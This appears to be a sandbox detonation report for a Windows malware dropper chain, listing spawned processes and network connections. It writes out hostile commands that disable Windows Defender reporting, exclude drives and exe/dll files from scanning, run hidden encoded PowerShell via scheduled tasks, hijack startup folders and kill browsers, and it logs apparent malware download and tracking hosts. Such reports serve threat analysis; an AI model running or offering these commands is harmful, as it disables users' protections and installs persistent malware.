"C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp" /SL5="$70118,140006,56320,C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2032 -ip 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 624

C:\Users\Admin\Pictures\Adobe Films\tLNVEw8h3F1AhYGAczL871CL.exe

"C:\Users\Admin\Pictures\Adobe Films\tLNVEw8h3F1AhYGAczL871CL.exe"

C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe

"C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe" /S /UID=91

C:\Windows\system32\fondue.exe

"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll

C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2032 -ip 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 644

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe

"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2032 -ip 2032

C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe

"C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4900 -ip 4900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 652

C:\Users\Admin\AppData\Local\Temp\siww1049.exe

"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 600

C:\Users\Admin\AppData\Local\Temp\note6060.exe

"C:\Users\Admin\AppData\Local\Temp\note6060.exe"

C:\Users\Admin\AppData\Local\Temp\1.exe

"C:\Users\Admin\AppData\Local\Temp\1.exe"

C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe

"C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe" -h

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2032 -ip 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 588

C:\Users\Admin\AppData\Local\Temp\tvstream22.exe

"C:\Users\Admin\AppData\Local\Temp\tvstream22.exe"

C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp" /SL5="$601DE,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\inst200.exe

"C:\Users\Admin\AppData\Local\Temp\inst200.exe"

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe

"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 520 -p 5112 -ip 5112

C:\Users\Public\SteamKeyGen.exe

"C:\Users\Public\SteamKeyGen.exe"

C:\Users\Admin\AppData\Local\Temp\udontsay.exe

"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2032 -ip 2032

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"

C:\Users\Admin\AppData\Local\Temp\anytime1.exe

"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\AppData\Local\Temp\AB6EH.exe

"C:\Users\Admin\AppData\Local\Temp\AB6EH.exe"

C:\Users\Admin\AppData\Local\Temp\anytime3.exe

"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2516 -ip 2516

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\9KBMC.exe

"C:\Users\Admin\AppData\Local\Temp\9KBMC.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Users\Admin\AppData\Local\Temp\9KBMC67FIDAHIDD.exe

https://iplogger.org/1nXhi7

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Users\Admin\AppData\Local\Temp\anytime2.exe

"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\AppData\Local\Temp\L3MMH.exe

"C:\Users\Admin\AppData\Local\Temp\L3MMH.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Users\Admin\AppData\Local\Temp\9KGGD.exe

"C:\Users\Admin\AppData\Local\Temp\9KGGD.exe"

C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp" /SL5="$701BC,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gWVLwaCWd" /SC once /ST 03:32:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2032 -ip 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 884

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5112 -s 708

C:\Users\Public\SteamKeyNeg.exe

"C:\Users\Public\SteamKeyNeg.exe"

C:\Users\Admin\AppData\Local\Temp\6AHD0.exe

"C:\Users\Admin\AppData\Local\Temp\6AHD0.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 1264

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gWVLwaCWd"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe

"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\lEDcrpdl2pCEl\Application407.exe

C:\Users\Admin\AppData\Local\Temp\lEDcrpdl2pCEl\Application407.exe

C:\Users\Admin\AppData\Local\Temp\is-V54MM.tmp\nthostwins.exe

"C:\Users\Admin\AppData\Local\Temp\is-V54MM.tmp\nthostwins.exe" 81

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA4B.tmp.bat""

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d "C:\ProgramData\Protection Controller v6.0.5"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 536 -p 4976 -ip 4976

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4976 -s 2072

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\temp-working.exe

"C:\Users\Admin\AppData\Local\Temp\temp-working.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gWVLwaCWd"

C:\Windows\system32\timeout.exe

timeout 4

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bYhnlZZiGBwVWbxfjL" /SC once /ST 06:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\NgGwqggyBEjLeKfaL\wxUWNCCtxxWMNyL\yjOthBP.exe\" ZF /site_id 525403 /S" /V1 /F

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 472 -p 3140 -ip 3140

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3140 -s 2232

C:\ProgramData\Protection Controller v6.0.5\3e8f3f1f.exe

"C:\ProgramData\Protection Controller v6.0.5\3e8f3f1f.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 480 -p 2212 -ip 2212

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2212 -s 2236

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 560 -p 1972 -ip 1972

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1972 -s 2240

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 472 -p 5588 -ip 5588

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5588 -s 2284

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--oVWJq23b"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x7ffc779fdec0,0x7ffc779fded0,0x7ffc779fdee0

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff6a19c9e70,0x7ff6a19c9e80,0x7ff6a19c9e90

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --mojo-platform-channel-handle=1864 /prefetch:8

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --mojo-platform-channel-handle=2192 /prefetch:8

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2616 /prefetch:1

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2564 /prefetch:1

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3196 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
FR 2.18.109.224:443 storesdk.dsx.mp.microsoft.com tcp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 34.117.59.81:443 ipinfo.io tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 buck-bucket.s3.pl-waw.scw.cloud udp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 oneservercubo.xyz udp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 arghakhan-bulletein.xyz udp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 i.xyzgamei.com udp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
PL 151.115.10.1:80 buck-bucket.s3.pl-waw.scw.cloud tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 172.67.148.222:80 oneservercubo.xyz tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 199.188.201.89:80 arghakhan-bulletein.xyz tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.21.86.228:80 i.xyzgamei.com tcp
US 104.21.86.228:80 i.xyzgamei.com tcp
US 104.21.86.228:80 i.xyzgamei.com tcp
US 104.21.86.228:443 i.xyzgamei.com tcp
PL 151.115.10.1:80 buck-bucket.s3.pl-waw.scw.cloud tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
PL 151.115.10.1:80 buck-bucket.s3.pl-waw.scw.cloud tcp
PL 151.115.10.1:443 buck-bucket.s3.pl-waw.scw.cloud tcp
US 199.188.201.89:80 arghakhan-bulletein.xyz tcp
US 199.188.201.89:80 arghakhan-bulletein.xyz tcp
US 199.188.201.89:443 arghakhan-bulletein.xyz tcp
US 8.8.8.8:53 j.xyzgamej.com udp
US 172.67.221.89:443 j.xyzgamej.com tcp
US 8.8.8.8:53 v.xyzgamev.com udp
US 172.67.188.70:443 v.xyzgamev.com tcp
US 8.8.8.8:53 psychokitties.s3.pl-waw.scw.cloud udp
PL 151.115.10.1:80 psychokitties.s3.pl-waw.scw.cloud tcp
US 8.8.8.8:53 appwebstat.biz udp
NL 212.193.30.21:80 212.193.30.21 tcp
HK 152.32.193.91:80 152.32.193.91 tcp
US 172.67.188.70:443 v.xyzgamev.com tcp
US 8.8.8.8:53 iplis.ru udp
DE 148.251.234.93:443 iplis.ru tcp
US 8.8.8.8:53 blackhk1.beget.tech udp
US 8.8.8.8:53 iplogger.org udp
RU 5.101.153.227:80 blackhk1.beget.tech tcp
US 8.8.8.8:53 zonasertaneja.com.br udp
US 50.116.86.44:80 zonasertaneja.com.br tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 www.icodeps.com udp
US 149.28.253.196:443 www.icodeps.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 185.237.206.146:80 appwebstat.biz tcp
US 50.116.86.44:80 zonasertaneja.com.br tcp
US 8.8.8.8:53 udontsay.xyz udp
US 188.114.97.0:80 udontsay.xyz tcp
US 8.8.8.8:53 get.udontsay.xyz udp
US 188.114.96.0:80 get.udontsay.xyz tcp
US 50.116.86.44:80 zonasertaneja.com.br tcp
US 50.116.86.44:80 zonasertaneja.com.br tcp
US 50.116.86.44:80 zonasertaneja.com.br tcp
RU 185.173.38.91:80 appwebstat.biz tcp
US 8.8.8.8:53 ocsp.trust-provider.cn udp
US 50.116.86.44:80 zonasertaneja.com.br tcp
NL 142.250.179.206:80 www.google-analytics.com tcp
NL 47.246.48.208:80 ocsp.trust-provider.cn tcp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 54.72.21.137:80 checkip.amazonaws.com tcp
US 8.8.8.8:53 files.fastbestapp.com udp
DE 148.251.234.83:443 iplogger.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 172.67.192.181:443 files.fastbestapp.com tcp
US 50.116.86.44:80 zonasertaneja.com.br tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
RU 188.68.205.12:7053 tcp
US 8.8.8.8:53 gumishosaled.xyz udp
US 8.8.8.8:53 nongeeeeet.com udp
NL 185.45.192.228:80 gumishosaled.xyz tcp
DE 148.251.234.83:443 iplogger.org tcp
FI 46.161.1.88:80 nongeeeeet.com tcp
RU 193.150.103.38:80 tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
SC 185.215.113.20:21921 tcp
US 8.8.8.8:53 yandex.ru udp
RU 5.255.255.70:443 yandex.ru tcp
DE 148.251.234.83:443 iplogger.org tcp
FI 46.161.1.88:80 nongeeeeet.com tcp
US 8.8.8.8:53 api.ip.sb udp
DE 148.251.234.83:443 iplogger.org tcp
US 172.67.75.172:443 api.ip.sb tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 172.67.75.172:443 api.ip.sb tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
NL 142.250.179.206:80 www.google-analytics.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
DE 148.251.234.83:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
DE 148.251.234.83:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 download.studymathlive.com udp
CN 106.75.17.243:80 download.studymathlive.com tcp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 34.247.150.55:80 checkip.amazonaws.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 udontsay.xyz udp
US 188.114.97.0:443 udontsay.xyz tcp
US 188.114.97.0:443 udontsay.xyz tcp
RU 5.188.119.76:80 5.188.119.76 tcp
NL 85.202.169.226:80 tcp
US 8.8.8.8:53 paybiz.herokuapp.com udp
